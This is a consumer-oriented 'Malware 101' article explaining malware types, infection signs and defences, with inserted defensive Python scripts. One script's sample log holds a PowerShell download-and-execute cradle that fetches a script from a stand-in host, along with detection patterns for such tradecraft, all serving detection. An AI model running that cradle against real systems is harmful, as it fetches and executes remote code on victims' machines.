Malware 101


Introduction

It’s no surprise that the internet isn’t a completely safe place. Although the good that comes from its connectivity outweighs the bad, the variety of bad keeps growing.  Bad actors develop many types of malware in the hope that it infects your device so they can profit from you or cause you harm (usually both).  Fortunately, cybersecurity software companies are becoming increasingly responsive, and coupled with a few changes to your own online habits, you can greatly reduce your exposure to these unpleasant elements of online life. 

What is Malware?

The term ‘malware’ is a contraction of malicious software and refers to software designed to intentionally cause damage to, or gain unauthorised access to, a computer, server, or network.  There are a number of different types of malware (outlined in the section to follow).  Most are delivered in a file that needs to be opened or a link that needs to be clicked for the malware to execute and infect your device or system, though some (worms, covered below) spread without any user action at all. 

Malware, to be defined as such, requires the criterion of malicious intention to be met.  If a piece of software causes damage unintentionally because of some kind of development deficiency, weakness, or oversight, it’s considered a ‘software bug’ and not malware. 

What types of Malware exist?

There are many types of malware, with new types and modified variations of existing types being created as legacy ones become easier to identify or defend against. The nine listed below, in no particular order, are the most common types the typical internet user is likely to be exposed to and should be aware of.

Keylogger:

Keylogger malware records a user’s keystrokes and mouse clicks, stores the gathered information and sends it back to the bad actor who deployed it.  This is a way to gain usernames, passwords, credit card numbers and similar valuable or sensitive data. The scary thing is that every keystroke and mouse click can be recorded, even if you backspace or delete what you typed.

This is compounded by the fact that keyloggers are not illegal pieces of software in themselves, so not all antimalware software is good at differentiating between legitimate and malicious keyloggers. Examples of legitimate keyloggers include:

  • Employers can purchase legitimate keyloggers for company-provided devices to ensure employees are not accessing personal or banned websites and are not leaking intellectual property. This is why we recommend keeping your work and personal devices and accounts separate in our article about good password hygiene
  • Parental control software, used by parents to monitor their children’s use of the internet to keep them safe from exploitation, grooming, explicit websites, etc. There are different types of such software but many rely on keyloggers for monitoring
  • Similar software used for investigations by law enforcement, or for spousal tracking if one partner suspects the other of having an affair, for example. This is something Culprit #2 from our article The less obvious ways bad actors can access your data would do
  • Programs that respond to global keyboard shortcuts (hotkeys) even when they are not the active window; these rely on the same keyboard-hook mechanisms a keylogger uses, which is why scanners struggle to tell the two apart.

Ransomware:

Ransomware is a rather aggressive type of malware (it is distinct from ‘scareware’, which merely displays fake infection warnings to frighten the user into paying for a bogus fix).  Once ransomware infects a device it encrypts the user’s files, and sometimes the whole system, and locks the user out until a ransom is paid to the bad actor, usually in cryptocurrency, in exchange for the decryption key.  Paying does not guarantee that the key is ever delivered, which is why the backups recommended later matter so much.  Ransomware can become very expensive for high-net-worth individuals and organisations; however, everyday civilians are also targeted.  It is often distributed via a phishing link or attachment, and the code for it is easily purchased on the Dark Web (as is the code for other types of malware).

Spyware:

Spyware, as the name suggests, hides on the infected device and monitors what the user does on it.  It tends to be discreet, as its intent is not to disrupt the user.  Spyware primarily records data on the user’s interests and habits but can also record passwords, communications and credit card numbers.  Spyware is also used by everyday people wishing to spy on a spouse, their children, or employees. 

Virus:

Viruses are probably the type everyone has heard of.  A virus attaches its malicious code to existing clean programs or files, damaging the core functionality of a system and resulting in corrupted or deleted files and the problems which stem from that.  Viruses often arrive as an .exe (executable file), meaning they can sit dormant on a device until the user, usually inadvertently, runs that file.  Viruses replicate themselves by modifying other programs and infecting them with their malicious code, which is what distinguishes them from trojans, which do not self-replicate.

Adware:

Adware is designed to aggressively push unwanted adverts (usually pop-ups) to the user, often in such a manner that the only way to get rid of them is to click through.  The bad actors are paid per click or impression by the advertising networks rather than by the victim.  Adware is more annoying than threatening to personal data or the device itself; however, it can lead to unsafe websites where other types of malware are waiting. 

Fileless:

Fileless malware is among the most difficult to detect because it writes no malware executable to disk and so leaves very little footprint on the infected system.  It abuses trusted tools already built in to the operating system (PowerShell and similar administrative utilities) and runs from the device’s memory rather than from a file as the other types do.  Traditional file-scanning antimalware can miss it for this reason, and because its in-memory components are lost when the computer is rebooted it is harder to track forensically, although many fileless campaigns still leave a foothold in places such as the registry or scheduled tasks so that they survive a restart.  
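The tell-tale signs above (built-in tools, in-memory execution, PowerShell) can be turned into detection logic. As an added example, not code from the original article, here is a Python script that triages process-creation style log lines for the ‘living off the land’ PowerShell patterns fileless malware relies on: encoded commands, hidden windows, execution-policy bypass, and in-memory download-and-execute cradles. The pipe-separated log format, the sample lines, the indicator list and weights, and the example.invalid URL are all constructed for this example.

```python
"""Heuristic triage of PowerShell command lines for fileless-malware tradecraft.

Added example (not from the original article). The log format, sample lines,
indicator patterns and weights are constructed for illustration.
"""
import base64
import binascii
import re

# Indicator name -> (pattern, weight). Heuristic and illustrative, not exhaustive.
INDICATORS = {
    "encoded_command":   (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), 3),
    "hidden_window":     (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "no_profile":        (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "bypass_policy":     (re.compile(r"-(?:ep|ex|executionpolicy)\s+bypass", re.I), 1),
    "download_cradle":   (re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest", re.I), 3),
    "invoke_expression": (re.compile(r"\biex\b|invoke-expression", re.I), 2),
    "base64_decode":     (re.compile(r"frombase64string", re.I), 2),
    "reflective_load":   (re.compile(r"reflection\.assembly\]::load", re.I), 3),
}
SUSPICIOUS_THRESHOLD = 3

# The base64 blob that follows -enc / -EncodedCommand on the command line.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmd):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    match = ENCODED_ARG.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse_command(cmd):
    """Score one command line: which indicators fired, total weight, decoded payload."""
    decoded = decode_encoded_command(cmd)
    # Replace the base64 blob so its random letters cannot trip the patterns,
    # then scan the visible command line and the decoded payload separately.
    visible = ENCODED_ARG.sub("-EncodedCommand <blob>", cmd)
    texts = [visible] + ([decoded] if decoded else [])
    hits = {name for name, (pattern, _) in INDICATORS.items()
            if any(pattern.search(t) for t in texts)}
    score = sum(INDICATORS[name][1] for name in hits)
    return {"indicators": sorted(hits), "score": score,
            "suspicious": score >= SUSPICIOUS_THRESHOLD, "decoded": decoded}


def triage(log_lines):
    """Parse 'time|host|user|command' lines (constructed format) and return the
    suspicious ones as (score, time, host, user, indicators), highest score first."""
    findings = []
    for line in log_lines:
        time, host, user, cmd = line.split("|", 3)
        result = analyse_command(cmd)
        if result["suspicious"]:
            findings.append((result["score"], time, host, user, result["indicators"]))
    return sorted(findings, reverse=True)


def encode_for_powershell(script):
    """powershell -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a classic in-memory download-and-execute one-liner.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

# Constructed sample log: one benign admin command, two fileless-style launches.
SAMPLE_LOG = [
    "2024-01-01T09:00:00|WS01|alice|powershell.exe -NoProfile Get-ChildItem C:\\Users",
    "2024-01-01T09:05:00|WS01|alice|powershell.exe -nop -w hidden -ep bypass -c \"" + CRADLE + "\"",
    "2024-01-01T09:06:00|WS02|bob|powershell.exe -enc " + encode_for_powershell(CRADLE),
]

if __name__ == "__main__":
    for score, time, host, user, indicators in triage(SAMPLE_LOG):
        print(f"{time} {host} {user} score={score} {','.join(indicators)}")
```

The decoded payload is scanned separately from the visible command line so that the base64 text cannot produce accidental matches, and a single plain -NoProfile (common in legitimate scripts) stays below the threshold. In a real environment this logic would sit over Windows event 4688 (process creation with command line) or PowerShell script block logging (event 4104), and the weights and threshold would need tuning against the organisation’s own administrative scripts.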

Trojan:

A trojan, or ‘Trojan Horse’, is one of the most common types of malware and aptly gets its name from the famous story of the Trojan War.  This form of malware disguises itself as a legitimate, helpful, or otherwise reputable piece of software to trick users into thinking it is safe to download.  It is one of the more discreet forms of malware; however, once installed it can capture a wealth of data, up to and including user passwords, financial information, and other sensitive data, and send it all back to the bad actor who deployed it.  It can also create backdoors in your device’s security to let other malware in, though trojans themselves do not self-replicate. 

Worm:

Worms are designed to move from one system to another across a network without the involvement, or the knowledge, of any user along the way.  They exploit security weaknesses in software or operating systems, so, unlike most of the other types listed here, they require no user interaction to spread, and a single infected machine can go on to infect every reachable vulnerable machine. 

Wiper:

Wiper malware is designed to completely erase all data from its targeted device or server, in some cases after the data has first been sent back to the bad actor who deployed it.  The intention is usually sabotage, or competitive advantage through theft of intellectual property, and the targets tend to be, but are not always, corporations. 

What can malware be used for?

Broadly speaking, malware can access data, encrypt it, delete it, send it somewhere, alter how the computer functions, capture login credentials, and spy on what a user does on their device.  All of this is done behind the scenes and often, particularly with newer malware, users notice no change in their device’s performance until it is too late.  More specifically, bad actors use malware to:

  • Make money through the work malware is designed to do
  • Profit by selling malware code on the Dark Web
  • Steal personal, financial or business information from government targets
  • Steal personal information, passwords, credit card numbers, and other sensitive or incriminating files from civilian targets.  This is a major enabler of doxing the victim. 
  • Take control of a user’s device
  • Monitor the actions of a user on their device
  • Read our What is it that bad actors want? article for more insights about what they’re chasing and how they use malware to achieve their goals

Malware, or the same techniques, can also be used legitimately to:

  • Test upcoming and existing software for security vulnerabilities
  • Shut down the computers of bad actors / paedophiles / drug dealers and other operators on the Dark Web, essentially applying the same points from above against illegal behaviour. 

Malware can be spread through several different, usually disguised, methods including:

  • Email attachments: An email might claim the user is being summoned to court with attached documents being infected.
  • Phishing links
  • Advertising links
  • Apps
  • Software installations
  • USB drives: sometimes intentionally left outside targeted organisations in the hope that someone will pick one up and plug it into a networked computer.
  • Text messages

How to tell if a device is infected with malware?

Scanning with antimalware software is obviously the best way; however, there are some tell-tale signs too:

  • Slow device performance, frequent freezing, the dreaded ‘blue screen of death’, a lag between a keystroke and the character appearing on the screen. These are all especially noticeable with older devices
  • Frequent pop-up adverts
  • Issues or lag in shutting down or starting up a device
  • Suspicious warnings of infection followed by a solution to fix it
  • The browser redirects to websites the user wasn’t intending to visit
  • New toolbars or extensions appear in your browser, new processes in your Task Manager, or new programs in your applications folder. Search them online to check and uninstall them if they are suspect
  • Loss of access to accounts / password no longer works
  • Bogus new charges on your phone or credit card bill
  • Mobile users: suddenly reduced battery life
  • Mobile users: your contacts report receiving strange calls from your number
  • Mobile users: unexpected increase in data usage
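For the ‘new programs or processes appeared’ signs above, a practitioner takes a baseline rather than relying on memory. As an added example, not code from the original article, the Python script below fingerprints every file under a folder (your applications or startup folder, say) with SHA-256, stores the snapshot as JSON, and later reports what was added, removed or modified. The demo runs against a temporary directory and sample files it constructs itself.

```python
"""File-system baseline check for the 'new programs appeared' warning sign.

Added example (not from the original article). The demo directory, file names
and contents are constructed for illustration.
"""
import hashlib
import json
import os
import tempfile


def sha256_file(path, chunk_size=1 << 16):
    """Hash a file in chunks so large binaries don't have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map each regular file under root (relative path) to its SHA-256 digest."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):      # don't follow links out of the tree
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def diff_baseline(old, new):
    """Files added, removed and changed between two baselines (sorted lists)."""
    return {
        "added":   sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Snapshot a folder, then let a new program appear and an existing one be
    altered, and return what the comparison reports."""
    with tempfile.TemporaryDirectory() as root:
        apps = os.path.join(root, "apps")
        os.makedirs(apps)
        with open(os.path.join(apps, "editor.exe"), "wb") as f:
            f.write(b"legit editor v1")
        with open(os.path.join(apps, "browser.exe"), "wb") as f:
            f.write(b"legit browser v1")
        snapshot = os.path.join(root, "baseline.json")
        save_baseline(build_baseline(apps), snapshot)

        # Later: something dropped a new program and tampered with the browser.
        with open(os.path.join(apps, "helper_update.exe"), "wb") as f:
            f.write(b"unexpected new program")
        with open(os.path.join(apps, "browser.exe"), "ab") as f:
            f.write(b" + injected code")

        return diff_baseline(load_baseline(snapshot), build_baseline(apps))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the saved baseline somewhere the device itself cannot overwrite (a USB drive or cloud storage), since malware with write access to the disk can tamper with it. This catches dropped or modified files only; the fileless malware described earlier leaves nothing on disk for a check like this to find, which is exactly why that type is hard to detect.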

How to protect yourself from malware

Before we get to the tips we wanted to dispel some common myths, because protecting yourself from malware doesn’t come from choosing a certain operating system.  It is a consideration, as you’ll soon see, but its rightful place is further down the list.  It’s too common to hear people say they prefer MacOS because it’s far safer than Microsoft Windows with regards to malware.  This holds for classic viruses specifically; however, the gap is closing rapidly when it comes to the other types of malware such as adware, spyware, trojans, or keyloggers.  Linux tends to be considered the safest in this regard, but that is largely due to its fractional desktop market share compared to MacOS or Windows rather than any inherent immunity.

Bad actors tend to create malware for the most used systems to increase their pool of potential victims.  Linux, however, has a bit of a learning curve and isn’t recommended for people who are not tech savvy: a Linux system can still get malware if the user hasn’t set it up securely, which is harder to do than on the Windows or MacOS devices most people are familiar with.

The point we’re making is an important one: your habits play a bigger role in protecting your device from malware than the operating system you choose.  Whilst the most malware is created for Windows, a security-conscious Windows user can be more secure and better protected against malware than someone using MacOS or Linux who is nonchalant about cybersecurity.

Another myth is that laptops and desktops are more vulnerable than smartphones.  It is true that iPhone users suffer far fewer malware attacks than their Android counterparts, due to Google’s larger share of the mobile market and Apple’s walled-garden approach to apps.  But that is only the state of affairs as of this writing.  A smartphone has more real-time location tracking, audio recording and image capture capability than a desktop or laptop, making smartphones a more valuable target for malware now and especially into the future.

With advances in malware a smartphone, even an iPhone, may turn against its user, so iPhone users are still ahead from a risk-likelihood perspective, but the risk is no longer small enough to ignore.  iPhone users can also be victims of scam phone calls and text messages with links to fraudulent websites which capture login credentials, and similar scams.  These aren’t malware infections as such, but the point is similar to the one made earlier about operating systems: choosing an iPhone isn’t a huge cybersecurity advantage.  We’re not bashing iPhones here, by the way, we’re just saying they’re not as secure as public sentiment would suggest. 

Mobile users broadly are also more vulnerable, as they tend not to protect smartphones as diligently as desktops or laptops.  This may be due to the disposable nature (shorter anticipated life) and lower purchase price of smartphones in comparison to desktops and laptops.  This type of security fatigue can lead to malware infecting a phone through simple carelessness. 

The best things you can do are listed below; the first two are almost non-negotiable if you want to be serious:

  • Having some form of antimalware software is the strongest precaution to consider; the best on the market update their protection against new threats every few days (through cloud updates, and thus quicker than the software patches outlined next).  Most antivirus programs on the market come with protection against all types of malware (spyware, adware, etc.) amongst other security-focused features.  Free versions are also available, but they may not get updates as regularly as paid options. 
  • Keeping software up to date!  We know this tip is so common it’s almost worth an eye-roll.  Software updates, though, are mostly a combination of two things: usability enhancements and, more importantly, security improvements and patches.  Indeed, Microsoft has upgraded its Windows Defender package to detect irregular activity from PowerShell, which is used by the fileless malware outlined earlier.  Update software as soon as updates are released, as they’re usually created with knowledge of the latest threats.  Bad actors look for known vulnerabilities in outdated software, making those suffering from security fatigue and not updating an easy target.  Check out our article on the importance of software updates here.
  • Implement 2FA on your accounts to protect against keyloggers: access to an account isn’t granted with just a username and password, so a bad actor would need the other authentication factor to get in.  Note that 2FA doesn’t stop the keylogger from capturing the password itself, so still change any passwords typed on an infected device once it has been cleaned
  • Use an ad-blocking browser extension: most browsers offer adblocker extensions as well as other plugins that help block malicious content
  • Be aware of phishing scams and keep that at the forefront of your mind when scanning your inbox.  Email is one of the main delivery methods for most forms of malware
  • Back up your most important files regularly.  This can be as easy as backing up to a USB drive once a month and keeping that drive disconnected and locked in a secure safe (a backup drive that stays plugged in can be encrypted by ransomware along with everything else).  Backing up to a secure cloud provider is also an option.
  • Download software only from a reputable source such as your operating system’s native ‘app store’
  • Don’t ‘enable macros’ if a download asks you to unless you are 100% sure what those macros do, read this article for more information about enabling macros
  • Never click on a pop-up advert; close the browser tab or window that generated it.
  • Limit the apps on your devices, delete ones you no longer use or need. 
  • Research apps before downloading them; any user review reporting a change in system performance should be a flag
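Two of the points above, infected email attachments (listed under how malware spreads) and the ‘enable macros’ prompt, can be checked before a file is ever opened. As an added example, not code from the original article, this Python script flags attachment names with executable or double extensions and opens modern Office files (which are ZIP containers) to see whether a VBA project is embedded. The extension lists are illustrative, and the sample documents are constructed in memory with only the parts this check inspects.

```python
"""Pre-flight check for e-mail attachments: dangerous names and Office macros.

Added example (not from the original article). Extension lists are
illustrative; sample documents are constructed in memory.
"""
import io
import zipfile

# Extensions that run code directly when double-clicked (illustrative list).
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "ps1", "vbs", "js",
                  "jse", "wsf", "hta", "msi", "lnk", "jar"}
# Harmless-looking extensions used as the middle part of a double extension.
DECOY_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
OFFICE_EXT = {"docx", "docm", "dotm", "xlsx", "xlsm", "xltm", "pptx", "pptm"}
MACRO_ENABLED_EXT = {"docm", "dotm", "xlsm", "xltm", "pptm"}
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"                           # OOXML (docx/xlsx/pptx) container


def extension(name):
    return name.lower().rsplit(".", 1)[-1] if "." in name else ""


def check_filename(name):
    """Warnings derived from the attachment name alone."""
    parts = name.lower().split(".")
    warnings = []
    if len(parts) < 2:
        return warnings
    ext = parts[-1]
    if ext in EXECUTABLE_EXT:
        warnings.append(f"executable extension .{ext}")
    if len(parts) > 2 and parts[-2] in DECOY_EXT:
        warnings.append(f"double extension .{parts[-2]}.{ext} (disguised file type)")
    if ext in MACRO_ENABLED_EXT:
        warnings.append(f"macro-enabled Office format .{ext}")
    return warnings


def office_has_macros(data):
    """True/False for an OOXML file depending on whether a VBA project part is
    present; None if the bytes are not a readable ZIP container."""
    if not data.startswith(ZIP_MAGIC):
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = [n.lower() for n in z.namelist()]
    except zipfile.BadZipFile:
        return None
    # Word, Excel and PowerPoint store VBA as word|xl|ppt/vbaProject.bin.
    return any(n.endswith("/vbaproject.bin") for n in names)


def check_attachment(name, data):
    """Combine name and content checks; returns (verdict, reasons) with the
    verdict being 'block', 'warn' or 'allow'."""
    reasons = check_filename(name)
    ext = extension(name)
    if data.startswith(OLE2_MAGIC):
        reasons.append("legacy OLE2 Office file; inspect with a VBA-aware tool before opening")
    elif office_has_macros(data):
        reasons.append("contains a VBA project (macros)")
        if ext in OFFICE_EXT - MACRO_ENABLED_EXT:
            reasons.append("macros inside a file named as a macro-free format")
    hard_block = ext in EXECUTABLE_EXT or any(r.startswith("double extension") for r in reasons)
    verdict = "block" if hard_block else ("warn" if reasons else "allow")
    return verdict, reasons


def make_docx(with_macros):
    """Construct a minimal OOXML container in memory (only the parts this check
    looks at; it is not a complete, openable document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            z.writestr("word/vbaProject.bin", b"\x00placeholder VBA project\x00")
    return buf.getvalue()


if __name__ == "__main__":
    samples = [
        ("report.docx", make_docx(False)),
        ("invoice.docx", make_docx(True)),
        ("quarterly.docm", make_docx(True)),
        ("invoice.pdf.exe", b"MZ"),
    ]
    for filename, content in samples:
        print(filename, check_attachment(filename, content))
```

A ‘warn’ verdict on a document means it carries macros and the ‘enable content’ prompt should be treated as hostile unless the sender and purpose are beyond doubt. Legacy .doc/.xls files use the OLE2 container rather than ZIP, and Excel 4.0 macro sheets are stored differently again, so those are flagged for inspection with a VBA-aware tool rather than parsed here.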

Conclusion

A combination of protective tools and user vigilance is the best way to guard against the threat malware poses.  Respect all devices you have with internet connectivity from a security standpoint, especially IoT devices (see the first link under Further Reading below for why).  Take this into account when purchasing antimalware software: if you use a combination of MacOS, Windows, and Linux devices, for example, ensure the software is compatible with all three, as modern antimalware products let users install on a number of devices.  The use of reputable antimalware software and installing software updates as soon as they are released are the two best precautions to take. 

Further Reading

Read our Internet of Things 101 article as we touched on how these devices have been rushed to market at the expense of adequate security measures

A more technical outline of Fileless Malware from Microsoft

This article is written in line with our Terms & Conditions and Disclaimer. As such all content is of a general nature only and is not intended as legal, financial, social or professional advice of any sort. Actions, decisions, investments or changes to device settings or personal behaviour as a result of this content is at the users own risk. Privacy Rightfully makes no guarantees of the accuracy, results or outcomes of the content and does not represent the content to be a full and complete solution to any issue discussed. Privacy Rightfully will not be held liable for any actions taken by a user/s as a result of this content. Please consider your own circumstances, conduct further research, assess all risks and engage professional advice where possible.
